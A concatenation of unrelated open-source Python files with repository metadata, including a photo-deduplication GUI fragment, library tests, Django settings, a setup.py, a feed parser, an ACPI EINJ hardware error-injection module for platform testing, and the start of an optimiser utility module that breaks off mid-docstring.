progress_bar = ttk.Progressbar(root, orient=Tkinter.HORIZONTAL, length=PROGRESS_BAR_LENGTH, mode='determinate')
progress_bar.grid(row=2, column=2, columnspan=2, sticky=Tkinter.E+Tkinter.W, padx=10)
db = database.Database(progress_bar)
# create buttons
#button_cfg = button.ConfigButton(root, db, 2, 3)
button_next = button.NextBatchButton(root, batch_photo_frame, display_photo_frame, display_photo_info_frame, db, 2, 1)
button_open = button.OpenFolderButton(root, batch_photo_frame, db, button_next, 2, 0)
root.mainloop()
|
ybdarrenwang/DuplicatedPhotoFinder
|
main.py
|
Python
|
bsd-3-clause
| 2,866
|
# coding=utf-8
import numpy as np
import bs
t = bs.common_types.table ()
n_rows = 10
n_cols = 5
t.init (n_rows, n_cols);
for i in xrange (n_cols):
t.set_col_name (i, "Col " + str (i))
a = np.linspace (float (i), float (i + 1), n_rows)
t.set_col_values (i, a)
print t
|
bs-eagle/bs-eagle
|
common_types/python/table_test.py
|
Python
|
bsd-3-clause
| 279
|
from microscopes.mixture.definition import model_definition
from microscopes.models import bb, niw
from nose.tools import (
assert_equals,
assert_is_not,
)
import pickle
import copy
def test_model_definition_pickle():
defn = model_definition(10, [bb, niw(3)])
bstr = pickle.dumps(defn)
defn1 = pickle.loads(bstr)
assert_equals(defn.n(), defn1.n())
assert_equals(len(defn.models()), len(defn1.models()))
for a, b in zip(defn.models(), defn1.models()):
assert_equals(a.name(), b.name())
def test_model_definition_copy():
defn = model_definition(10, [bb, niw(3)])
defn_shallow = copy.copy(defn)
defn_deep = copy.deepcopy(defn)
assert_is_not(defn, defn_shallow)
assert_is_not(defn, defn_deep)
assert_is_not(defn._models, defn_deep._models)
assert_equals(defn.n(), defn_shallow.n())
assert_equals(defn.n(), defn_deep.n())
|
datamicroscopes/mixturemodel
|
test/test_definition.py
|
Python
|
bsd-3-clause
| 893
|
from django.apps import AppConfig
class UsersConfig(AppConfig):
name = 'users'
verbose_name = "Usuarios"
|
flipjack/tecnoservicio
|
tecnoservicio/ordenes/apps.py
|
Python
|
bsd-3-clause
| 113
|
SECRET_KEY = 'not-anymore'
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
}
INSTALLED_APPS = [
'reverse_unique',
'reverse_unique_tests',
]
|
akaariai/django-reverse-unique
|
reverse_unique_tests/settings.py
|
Python
|
bsd-3-clause
| 277
|
#!/usr/bin/env python
"""
Hiveary
https://hiveary.com
Licensed under Simplified BSD License (see LICENSE)
(C) Hiveary, Inc. 2013-2014 all rights reserved
"""
import platform
import sys
from hiveary import __version__ as version
current_platform = platform.system()
FROZEN_NAME = 'hiveary-agent'
AUTHOR = "Hiveary"
AUTHOR_EMAIL = "info@hiveary.com"
DESCRIPTION = "Hiveary Monitoring Agent"
LICENSE = "Simplified BSD"
URL = "http://hiveary.com"
# OS-specific setup
if 'bdist_esky' in sys.argv and current_platform == 'Windows':
# Use esky/cxfreeze to build the agent and py2exe to build the service
from esky.bdist_esky import Executable
from glob import glob
import os
import py2exe # noqa
import setuptools
import shutil
modules = [
'kombu.transport.pyamqp',
'kombu.transport.base',
'kombu.transport.amqplib',
]
sys.path.append('C:\\Program Files (x86)\\Microsoft Visual Studio 9.0\\VC\\redist\\x86\\Microsoft.VC90.CRT')
# Add in Visual Studio C++ compiler library
data_files = [
('Microsoft.VC90.CRT', glob(r'C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\redist\x86\Microsoft.VC90.CRT\*.*')),
r'hiveary\ca-bundle.pem',
('monitors', glob(r'monitors\*.py'))
]
script = Executable('hiveary-agent', gui_only=False)
options = {
'bdist_esky': {
'freezer_module': 'cxfreeze',
'includes': modules,
}
}
# Build the agent
setuptools.setup(name=FROZEN_NAME,
version=version,
scripts=[script],
options=options,
data_files=data_files,
)
sys.argv.remove('bdist_esky')
sys.argv.append('py2exe')
# used for the versioninfo resource
class Target(object):
def __init__(self, **kw):
self.__dict__.update(kw)
self.version = version
self.company_name = 'Hiveary'
self.name = "HivearyService"
script = Target(
description='Hiveary Agent Service Launcher',
modules=["HivearyService"],
cmdline_style='pywin32')
data_files = []
# Build the service
setuptools.setup(name='HivearyService',
version=version,
options={'py2exe': {}},
service=[script]
)
# python27.dll will be available at the root once the esky zip is extracted,
# so we can remove it now
os.remove(r'dist\python27.dll')
shutil.rmtree('build')
else:
try:
from setuptools import setup, find_packages
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
# Include all files from the package.
install_requires = [
'amqplib>=1.0.2',
'kombu>=3.0.8',
'netifaces-merged>=0.9.0',
'oauth2>=1.5.211',
'psutil>=1.1.0',
'simplejson>=3.0.5',
'Twisted>=13.2.0',
'impala>=0.1.1',
]
data_files = [
('/etc/hiveary', ['hiveary.conf.example', 'README.md']),
('/etc/hiveary/init', ['initd/hiveary-agent']),
('/etc/hiveary/systemd', ['arch/hiveary-agent.service']),
('/usr/lib/hiveary', ['monitors/resources.py']),
]
setup(name=FROZEN_NAME,
version=version,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
description=DESCRIPTION,
license=LICENSE,
url=URL,
include_package_data=True,
data_files=data_files,
install_requires=install_requires,
packages=find_packages(),
scripts=['hiveary-agent']
)
|
hiveary/hiveary-agent
|
setup.py
|
Python
|
bsd-3-clause
| 3,550
|
def extractToomtummootstranslationsWordpressCom(item):
'''
Parser for 'toomtummootstranslations.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
fake-name/ReadableWebProxy
|
WebMirror/management/rss_parser_funcs/feed_parse_extractToomtummootstranslationsWordpressCom.py
|
Python
|
bsd-3-clause
| 588
|
# Copyright (c) 2015, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Error Injection EINJ module."""
from __future__ import print_function
import acpi
import bits
import contextlib
from cpudetect import cpulib
import ctypes
import functools
import ttypager
# Create constants for each value in these dictionaries for readability. These
# names are too generic to put in the acpi module's namespace, but they make
# sense in the einj module.
globals().update(map(reversed, acpi._error_injection_action.iteritems()))
globals().update(map(reversed, acpi._error_injection_instruction.iteritems()))
read_mem = {
1: bits.readb,
2: bits.readw,
3: bits.readl,
4: bits.readq,
}
write_mem = {
1: bits.writeb,
2: bits.writew,
3: bits.writel,
4: bits.writeq,
}
out_port = {
1: bits.outb,
2: bits.outw,
3: bits.outl,
}
error_injection_command_status = {
0x0: 'SUCCESS',
0x1: 'UNKNOWN_FAILURE',
0x2: 'INVALID_ACCESS',
}
globals().update(map(reversed, error_injection_command_status.iteritems()))
# List of actions that can be executed with no custom processing
_action_simple = [
BEGIN_INJECTION_OPERATION,
END_OPERATION,
EXECUTE_OPERATION,
CHECK_BUSY_STATUS,
GET_COMMAND_STATUS,
]
def _execute_action(entry, value=None):
print("entry.injection_action = {:#x} ({})".format(entry.injection_action, acpi._error_injection_action.get(entry.injection_action, "Unknown")))
if entry.injection_action in _action_simple:
return _execute_instruction(entry)
elif entry.injection_action == GET_TRIGGER_ERROR_ACTION_TABLE:
return acpi.trigger_error_action(_execute_instruction(entry))
elif entry.injection_action == SET_ERROR_TYPE:
if value is None:
raise ValueError("action SET_ERROR_TYPE but no input parameter provided")
return _execute_instruction(entry, value.data)
elif entry.injection_action == GET_ERROR_TYPE:
_execute_instruction(entry)
return acpi.error_type_flags.from_address(entry.register_region.address)
elif entry.injection_action == SET_ERROR_TYPE_WITH_ADDRESS:
if value is None:
raise ValueError("action SET_ERROR_TYPE_WITH_ADDRESS but no input paramters provided")
error_type = value[0]
if error_type.processor_correctable or error_type.processor_uncorrectable_non_fatal or error_type.processor_uncorrectable_fatal:
error_type, flags, apicid = value
cpu_error = acpi.set_error_type_with_addr.from_address(entry.register_region.address)
if cpu_error.error_type.vendor_defined and cpu_error.vendor_error_type_extension_structure_offset:
vendor_err_addr = entry.register_region.address + cpu_error.vendor_error_type_extension_structure_offset
vendor_error_type_extension = acpi.set_error_type_with_addr.from_address(vendor_err_addr)
print(vendor_error_type_extension)
print('WRITE_REGISTER SET_ERROR_TYPE_WITH_ADDRESS address - {0:#x}'.format(entry.register_region.address))
cpu_error.error_type = error_type
cpu_error.flags = flags
cpu_error.apicid = apicid
print(cpu_error)
elif error_type.memory_correctable or error_type.memory_uncorrectable_non_fatal or error_type.memory_uncorrectable_fatal:
error_type, flags, mem_addr, mem_addr_range = value
mem_error = acpi.set_error_type_with_addr.from_address(entry.register_region.address)
print('WRITE_REGISTER SET_ERROR_TYPE_WITH_ADDRESS address - {0:#x}'.format(entry.register_region.address))
mem_error.error_type = error_type
mem_error.flags = flags
mem_error.memory_address = mem_addr
mem_error.memory_address_range = mem_addr_range
print(mem_error)
elif error_type.pci_express_correctable or error_type.pci_express_uncorrectable_non_fatal or error_type.pci_express_uncorrectable_fatal:
error_type, flags, segment, bus, device, function = value
pcie_error = acpi.set_error_type_with_addr.from_address(entry.register_region.address)
print('WRITE_REGISTER SET_ERROR_TYPE_WITH_ADDRESS address - {0:#x}'.format(entry.register_region.address))
pcie_error.error_type = error_type
pcie_error.flags = flags
pcie_error.pcie_sbdf.bits.function_num = function
pcie_error.pcie_sbdf.bits.device_num = device
pcie_error.pcie_sbdf.bits.bus_num = bus
pcie_error.pcie_sbdf.bits.pcie_segment = segment
print(pcie_error)
else:
raise ValueError("action SET_ERROR_TYPE_WITH_ADDRESS has unsupported error_type {}".format(error_type))
elif entry.injection_action == TRIGGER_ERROR:
# Execute the actions specified in the trigger action table.
trigger_table = get_trigger_action_table_op()
for entry in trigger_table.entries:
_execute_instruction(entry)
else:
raise ValueError("action is unsupported")
def _execute_instruction(entry, value=None):
print("entry.instruction = {:#x} ({})".format(entry.instruction, acpi._error_injection_instruction.get(entry.instruction, "Unknown")))
if entry.instruction is READ_REGISTER:
return _read_register(entry)
elif entry.instruction is READ_REGISTER_VALUE:
return _read_register_value(entry)
elif entry.instruction is WRITE_REGISTER_VALUE:
return _write_register(entry)
elif entry.instruction is WRITE_REGISTER:
return _write_register(entry, value)
elif entry.instruction is NOOP:
return None
def _read_register(entry):
if entry.register_region.address_space_id == acpi.ASID_SYSTEM_MEMORY:
print('READ_REGISTER address - {:#x}'.format(entry.register_region.address))
value = read_mem[entry.register_region.access_size](entry.register_region.address)
value = value >> entry.register_region.register_bit_offset
value = value & entry.mask
print('READ_REGISTER value - {:#x}'.format(value))
return value
return None
def _read_register_value(entry):
read_value = _read_register(entry)
read_value = read_value >> entry.register_region.register_bit_offset
read_value = read_value & entry.mask
print('entry.value - {:#x}'.format(entry.value))
return read_value == entry.value
def _write_register(entry, value=None):
if not value:
value = entry.value
if entry.register_region.address_space_id == acpi.ASID_SYSTEM_MEMORY:
print('WRITE_REGISTER address - {:#x}'.format(entry.register_region.address))
read_value = read_mem[entry.register_region.access_size](entry.register_region.address)
print('WRITE_REGISTER before value - {:#x}'.format(read_value))
if entry.flags.bits.preserve_register:
read_value = read_value & ~(entry.mask << entry.register_region.register_bit_offset)
value = value | read_value
write_mem[entry.register_region.access_size](entry.register_region.address, value)
read_value = read_mem[entry.register_region.access_size](entry.register_region.address)
print('WRITE_REGISTER after value - {:#x}'.format(read_value))
elif entry.register_region.address_space_id == acpi.ASID_SYSTEM_IO:
print('WRITE_REGISTER_VALUE IO address - {:#x}'.format(entry.register_region.address))
print('WRITE_REGISTER_VALUE value to write - {:#x}'.format(entry.value))
out_port[entry.register_region.access_size](entry.register_region.address, value)
else:
raise ValueError("Unsupported address_space_id: {}".format(entry.register_region.address_space_id))
def _write_register_value(entry, value):
_write_register(entry, value)
def get_action(action):
einj = acpi.parse_einj()
if einj is None:
raise RuntimeError("No ACPI EINJ table found")
for entry in einj.entries:
if entry.injection_action == action:
return entry
def get_and_execute_op(action, value=None):
entry = get_action(action)
if entry is None:
print('Error: Unexpected Action')
return
return _execute_action(entry, value)
def begin_inject_op():
return get_and_execute_op(BEGIN_INJECTION_OPERATION)
def get_trigger_action_table_op():
return get_and_execute_op(GET_TRIGGER_ERROR_ACTION_TABLE)
def set_error_type_op(error_type):
return get_and_execute_op(SET_ERROR_TYPE, error_type)
def get_error_type_op():
return get_and_execute_op(GET_ERROR_TYPE)
def end_inject_op():
return get_and_execute_op(END_OPERATION)
def execute_inject_op():
return get_and_execute_op(EXECUTE_OPERATION)
def _execute_trigger_error_op():
# Create an Trigger Error action to execute
entry = acpi.InjectionInstructionEntry()
entry.injection_action = TRIGGER_ERROR
return _execute_action(entry)
def check_busy_status_op():
busy_status = get_and_execute_op(CHECK_BUSY_STATUS)
print('busy_status = {}'.format('Busy' if busy_status else 'Not Busy'))
return busy_status
def get_cmd_status_op():
cmd_status = get_and_execute_op(GET_COMMAND_STATUS)
print('cmd_status = {:#x} ({})'.format(cmd_status, error_injection_command_status.get(cmd_status, 'Unknown')))
return cmd_status
# This routine is specific to setting a memory error
def _set_error_type_with_addr_op_mem(error_type, flags, mem_addr=None, mem_addr_range=None):
return get_and_execute_op(SET_ERROR_TYPE_WITH_ADDRESS, (error_type, flags, mem_addr, mem_addr_range))
# This routine is specific to setting a processor error
def _set_error_type_with_addr_op_cpu(error_type, flags, apicid=None):
return get_and_execute_op(SET_ERROR_TYPE_WITH_ADDRESS, (error_type, flags, apicid))
# This routine is specific to setting a PCIE error
def _set_error_type_with_addr_op_pcie(error_type, flags, segment=None, bus=None, device=None, function=None):
return get_and_execute_op(SET_ERROR_TYPE_WITH_ADDRESS, (error_type, flags, (segment, bus, device, function)))
def einj_cpu_init():
"""Return the error injection cpu init method.
Returns the cpu-specific method if available, otherwise default.
Computed on first call, and cached for subsequent return."""
global einj_cpu_init
@contextlib.contextmanager
def default_cpu_init():
yield
try:
local_einj_cpu_init = cpulib.quirk_einj_cpu_init
print("QUIRK: Setting processor-specific error injection init")
except AttributeError:
local_einj_cpu_init = default_cpu_init
old_func = einj_cpu_init
def einj_cpu_init():
return local_einj_cpu_init()
functools.update_wrapper(einj_cpu_init, old_func)
return local_einj_cpu_init()
@contextlib.contextmanager
def _error_injection_op():
with einj_cpu_init():
begin_inject_op()
yield
execute_inject_op()
while check_busy_status_op():
continue
cmd_status = get_cmd_status_op()
if cmd_status != SUCCESS:
return
_execute_trigger_error_op()
end_inject_op()
@contextlib.contextmanager
def _inject_memory_error(address=None, mask=None):
# Constructor creates a structure with all zero init
error_type = acpi.error_type_flags()
yield error_type
if (address is not None) and (mask is not None):
# Constructor creates a structure with all zero init
flags = acpi.set_error_type_with_addr_flags()
flags.memory_addr_and_mask_valid = 1
_set_error_type_with_addr_op_mem(error_type, flags, address, mask)
else:
set_error_type_op(error_type)
def inject_memory_correctable_err(address=None, mask=None):
""" Inject memory correctable error.
If address and mask are provided, then SET_ERROR_TYPE_WITH_ADDRESS
Error Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().memory_correctable == 0:
print('Memory Correctable error injection is not supported')
return
with _error_injection_op():
with _inject_memory_error(address, mask) as error_type:
error_type.memory_correctable = 1
def inject_memory_unc_nonfatal_err(address=None, mask=None):
"""Inject memory uncorrectable non-fatal error.
If address and mask are provided, then SET_ERROR_TYPE_WITH_ADDRESS
Error Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().memory_uncorrectable_non_fatal == 0:
print('Memory Uncorrectable non-Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_memory_error(address, mask) as error_type:
error_type.memory_uncorrectable_non_fatal = 1
def inject_memory_unc_fatal_err(address=None, mask=None):
"""Inject memory uncorrectable fatal error.
If address and mask are provided, then SET_ERROR_TYPE_WITH_ADDRESS
Error Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().memory_uncorrectable_fatal == 0:
print('Memory Uncorrectable Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_memory_error(address, mask) as error_type:
error_type.memory_uncorrectable_fatal = 1
@contextlib.contextmanager
def _inject_processor_error(apicid=None):
# Constructor creates a structure with all zero init
error_type = acpi.error_type_flags()
yield error_type
if apicid is not None:
# Constructor creates a structure with all zero init
flags = acpi.set_error_type_with_addr_flags()
flags.processor_apic_valid = 1
_set_error_type_with_addr_op_cpu(error_type, flags, apicid)
else:
set_error_type_op(error_type)
def inject_processor_correctable_err(apicid=None):
""" Inject processor correctable error.
If apicid is provided, then SET_ERROR_TYPE_WITH_ADDRESS Error
Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().processor_correctable == 0:
print('Processor Correctable error injection is not supported')
return
with _error_injection_op():
with _inject_processor_error(apicid) as error_type:
error_type.processor_correctable = 1
def inject_processor_unc_nonfatal_err(apicid=None):
"""Inject processor uncorrectable non-fatal error.
If apicid is provided, then SET_ERROR_TYPE_WITH_ADDRESS Error
Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().processor_uncorrectable_non_fatal == 0:
print('Processor Uncorrectable non-Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_processor_error(apicid) as error_type:
error_type.processor_uncorrectable_non_fatal = 1
def inject_processor_unc_fatal_err(address=None, mask=None):
"""Inject PCIE uncorrectable fatal error.
If apicid is provided, then SET_ERROR_TYPE_WITH_ADDRESS Error
Injection Action is used. Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().processor_uncorrectable_fatal == 0:
print('Processor Uncorrectable Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_processor_error(apicid) as error_type:
error_type.processor_uncorrectable_fatal = 1
@contextlib.contextmanager
def _inject_pcie_error(segment=None, bus=None, device=None, function=None):
# Constructor creates a structure with all zero init
error_type = acpi.error_type_flags()
yield error_type
if all(x is not None for x in (segment, bus, device, function)):
# Constructor creates a structure with all zero init
flags = acpi.set_error_type_with_addr_flags()
flags.pcie_sbdf_valid = 1
_set_error_type_with_addr_op_pcie(error_type, flags, segment, bus, device, function)
else:
set_error_type_op(error_type)
def inject_pcie_correctable_err(segment=None, bus=None, device=None, function=None):
""" Inject PCIE correctable error.
If segment, bus, device and function are provided, then
SET_ERROR_TYPE_WITH_ADDRESS Error Injection Action is used.
Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().pci_express_correctable == 0:
print('PCI Express Correctable error injection is not supported')
return
with _error_injection_op():
with _inject_pcie_error(segment=None, bus=None, device=None, function=None) as error_type:
error_type.pcie_express_correctable = 1
def inject_pcie_unc_nonfatal_err(segment=None, bus=None, device=None, function=None):
"""Inject PCIE uncorrectable non-fatal error.
If segment, bus, device and function are provided, then
SET_ERROR_TYPE_WITH_ADDRESS Error Injection Action is used.
Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().processor_uncorrectable_non_fatal == 0:
print('PCI Express Uncorrectable non-Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_pcie_error(segment=None, bus=None, device=None, function=None) as error_type:
error_type.pci_expresss_uncorrectable_non_fatal = 1
def inject_pcie_unc_fatal_err(segment=None, bus=None, device=None, function=None):
"""Inject PCIE uncorrectable fatal error.
If segment, bus, device and function are provided, then
SET_ERROR_TYPE_WITH_ADDRESS Error Injection Action is used.
Otherwise, SET_ERROR_TYPE is used."""
if get_error_type_op().pci_express_uncorrectable_fatal == 0:
print('PCIE Uncorrectable Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_pcie_error(segment=None, bus=None, device=None, function=None) as error_type:
error_type.processor_uncorrectable_fatal = 1
def _inject_platform_error():
# Constructor creates a structure with all zero init
error_type = acpi.error_type_flags()
yield error_type
set_error_type_op(error_type)
def inject_platform_correctable_err():
""" Inject platform correctable error."""
if get_error_type_op().platform_correctable == 0:
print('Platform Correctable error injection is not supported')
return
with _error_injection_op():
with _inject_platform_error() as error_type:
error_type.platform_correctable = 1
def inject_platform_unc_nonfatal_err():
"""Inject platform uncorrectable non-fatal error."""
if get_error_type_op().platform_uncorrectable_non_fatal == 0:
print('Platform Uncorrectable non-Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_platform_error() as error_type:
error_type.platform_uncorrectable_non_fatal = 1
def inject_platform_unc_fatal_err():
"""Inject platform uncorrectable fatal error."""
if get_error_type_op().platform_uncorrectable_fatal == 0:
print('Platform Uncorrectable Fatal error injection is not supported')
return
with _error_injection_op():
with _inject_platform_error() as error_type:
error_type.platform_uncorrectable_fatal = 1
def display_einj_address():
address = acpi.get_table_addr("EINJ", 0)
if address is not None:
print('EINJ address {0:#x}'.format(address))
def display_supported_errors():
print(get_error_type_op())
def display_triggers():
with ttypager.page():
print(get_trigger_action_table_op())
def display_vendor_error_type_extension():
with ttypager.page():
entry = get_action(SET_ERROR_TYPE_WITH_ADDRESS)
set_err = acpi.set_error_type_with_addr.from_address(entry.register_region.address)
vendor_err_addr = entry.register_region.address + set_err.vendor_error_type_extension_structure_offset
vendor_err = acpi.vendor_error_type_extension.from_address(vendor_err_addr)
print(vendor_err)
def display_einj():
with ttypager.page():
einj = acpi.parse_einj()
if einj is None:
raise RuntimeError("No ACPI EINJ table found")
print(einj)
def demo():
unc_methods = [
inject_memory_unc_nonfatal_err,
inject_memory_unc_fatal_err,
inject_processor_unc_nonfatal_err,
inject_processor_unc_fatal_err,
inject_pcie_unc_nonfatal_err,
inject_pcie_unc_fatal_err,
inject_platform_unc_nonfatal_err,
inject_platform_unc_fatal_err,
]
corr_methods = [
inject_memory_correctable_err,
inject_processor_correctable_err,
inject_pcie_correctable_err,
inject_platform_correctable_err,
]
display_methods = [
display_einj,
display_einj_address,
display_supported_errors,
display_triggers,
display_vendor_error_type_extension,
]
with ttypager.page():
for item in display_methods:
print("\n\n\nMethod name: {}".format(item.__name__))
print("Method doc:\n{}\n\n".format(item.__doc__ if item.__doc__ else "No documentation for this method"))
item()
for item in corr_methods:
print("\n\nMethod name: {}".format(item.__name__))
print("Method doc: {}".format(item.__doc__ if item.__doc__ else "No documentation for this method"))
item()
for item in unc_methods:
print("\n\n\nMethod name: {}".format(item.__name__))
print("Method doc: {}\n\n".format(item.__doc__ if item.__doc__ else "No documentation for this method"))
print("Based on the name and documentation of this item, it is likely to be fatal.")
print("Execute it directly from the python command line.")
print("Your mileage may vary and if it breaks, you get to keep all the pieces.")
|
ii0/bits
|
python/einj.py
|
Python
|
bsd-3-clause
| 23,447
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import inspect
import itertools
import random
import warnings
import numpy as np
from .gd import GradientDescent
from .bfgs import Lbfgs
from .cg import NonlinearConjugateGradient
from .rprop import Rprop
from .rmsprop import RmsProp
from .adadelta import Adadelta
from .adam import Adam
from radagrad import Radagrad
from adagrad import Adagrad
from adagrad_full import AdagradFull
try:
from sklearn.grid_search import ParameterSampler
except ImportError:
pass
def is_garray(cand):
return hasattr(cand, 'as_numpy_array')
def is_array(cand):
return is_garray(cand) or isinstance(cand, np.ndarray)
def clear_info(info):
"""Clean up contents of info dictionary for better use.
Keys to be removed are ``args``, ``kwargs`` and any non-scalar numpy or
gnumpy arrays. Numpy scalars are converted to floats.
Examples
--------
>>> import numpy as np
>>> info = {'args': None, 'foo': np.zeros(3), 'bar': np.array(1),
... 'loss': 1.}
>>> cleared = clear_info(info)
>>> cleared == {'bar': 1.0, 'loss': 1.0}
True
"""
items = info.iteritems()
items = ((k, float(v.reshape((1,))[0]) if is_array(v) and v.size == 1 else v)
for k, v in items)
items = ((k, v) for k, v in items if not is_array(v))
items = ((k, v) for k, v in items if k not in ('args', 'kwargs'))
return dict(items)
def coroutine(f):
"""Turn a generator function into a coroutine by calling .next() once."""
def started(*args, **kwargs):
cr = f(*args, **kwargs)
next(cr)
return cr
return started
def aslist(item):
if not isinstance(item, (list, tuple)):
item = [item]
return item
def mini_slices(n_samples, batch_size):
"""Yield slices of size `batch_size` that work with a container of length
`n_samples`."""
n_batches, rest = divmod(n_samples, batch_size)
if rest != 0:
n_batches += 1
return [slice(i * batch_size, (i + 1) * batch_size) for i in range(n_batches)]
def draw_mini_slices(n_samples, batch_size, with_replacement=False):
slices = mini_slices(n_samples, batch_size)
idxs = range(len(slices))
if with_replacement:
yield random.choice(slices)
else:
while True:
random.shuffle(idxs)
for i in idxs:
yield slices[i]
def draw_mini_indices(n_samples, batch_size):
assert n_samples > batch_size
idxs = range(n_samples)
random.shuffle(idxs)
pos = 0
while True:
while pos + batch_size <= n_samples:
yield idxs[pos:pos + batch_size]
pos += batch_size
batch = idxs[pos:]
needed = batch_size - len(batch)
random.shuffle(idxs)
batch += idxs[0:needed]
yield batch
pos = needed
def optimizer(identifier, wrt, *args, **kwargs):
"""Return an optimizer with the desired configuration.
This is a convenience function if one wants to try out different optimizers
but wants to change as little code as possible.
Additional arguments and keyword arguments will be passed to the constructor
of the class. If the found class does not take the arguments supplied, this
will `not` throw an error, but pass silently.
:param identifier: String identifying the optimizer to use. Can be either
``asgd``, ``gd``, ``lbfgs``, ``ncg``, ``rprop``, ``adadelta`` or
``smd``.
:param wrt: Numpy array pointing to the data to optimize.
"""
klass_map = {
'gd': GradientDescent,
'lbfgs': Lbfgs,
'ncg': NonlinearConjugateGradient,
'rprop': Rprop,
'rmsprop': RmsProp,
'adadelta': Adadelta,
'adam': Adam,
'radagrad': Radagrad,
'adagrad-full': AdagradFull,
'adagrad': Adagrad,
}
# Find out which arguments to pass on.
klass = klass_map[identifier]
argspec = inspect.getargspec(klass.__init__)
if argspec.keywords is None:
# Issue a warning for each of the arguments that have been passed
# to this optimizer but were not used.
expected_keys = set(argspec.args)
given_keys = set(kwargs.keys())
unused_keys = given_keys - expected_keys
for i in unused_keys:
warnings.warn('Argument named %s is not expected by %s'
% (i, klass))
# We need to filter stuff out.
used_keys = expected_keys & given_keys
kwargs = dict((k, kwargs[k]) for k in used_keys)
try:
opt = klass(wrt, *args, **kwargs)
except TypeError:
raise TypeError('required arguments for %s: %s' % (klass, argspec.args))
return opt
def shaped_from_flat(flat, shapes):
"""Given a one dimensional array ``flat``, return a list of views of shapes
``shapes`` on that array.
Each view will point to a distinct memory region, consecutively allocated
in flat.
Parameters
----------
flat : array_like
Array of one dimension.
shapes : list of tuples of ints
Each entry of this list specifies the shape of the corresponding view
into ``flat``.
Returns
-------
views : list of arrays
Each entry has the shape given in ``shapes`` and points as a view into
``flat``.
"""
shapes = [(i,) if isinstance(i, int) else i for i in shapes]
sizes = [np.prod(i) for i in shapes]
n_used = 0
views = []
for size, shape in zip(sizes, shapes):
this = flat[n_used:n_used + size]
n_used += size
this.shape = shape
views.append(this)
return views
def empty_with_views(shapes, empty_func=np.empty):
"""Create an array and views shaped according to ``shapes``.
The ``shapes`` parameter is a list of tuples of ints. Each tuple
represents a desired shape for an array which will be allocated in a bigger
memory region. This memory region will be represented by an array as well.
For example, the shape speciciation ``[2, (3, 2)]`` will create an array
``flat`` of size 8. The first view will have a size of ``(2,)`` and point
to the first two entries, i.e. ``flat`[:2]`, while the second array will
have a shape of ``(3, 2)`` and point to the elements ``flat[2:8]``.
Parameters
----------
spec : list of tuples of ints
Specification of the desired shapes.
empty_func : callable
function that returns a memory region given an integer of the desired
size. (Examples include ``numpy.empty``, which is the default,
``gnumpy.empty`` and ``theano.tensor.empty``.
Returns
-------
flat : array_like (depending on ``empty_func``)
Memory region containing all the views.
views : list of array_like
Variable number of results. Each contains a view into the array
``flat``.
Examples
--------
>>> from climin.util import empty_with_views
>>> flat, (w, b) = empty_with_views([(3, 2), 2])
>>> w[...] = 1
>>> b[...] = 2
>>> flat
array([ 1., 1., 1., 1., 1., 1., 2., 2.])
>>> flat[0] = 3
>>> w
array([[ 3., 1.],
[ 1., 1.],
[ 1., 1.]])
"""
shapes = [(i,) if isinstance(i, int) else i for i in shapes]
sizes = [np.prod(i) for i in shapes]
n_pars = sum(sizes)
flat = empty_func(n_pars)
views = shaped_from_flat(flat, shapes)
return flat, views
def minibatches(arr, batch_size, d=0):
"""Return a list of views of the given arr.
Each view represents a mini bach of the data.
Parameters
----------
arr : array_like
Array to obtain batches from. Needs to be slicable. If ``d > 0``, needs
to have a ``.shape`` attribute from which the number of samples can
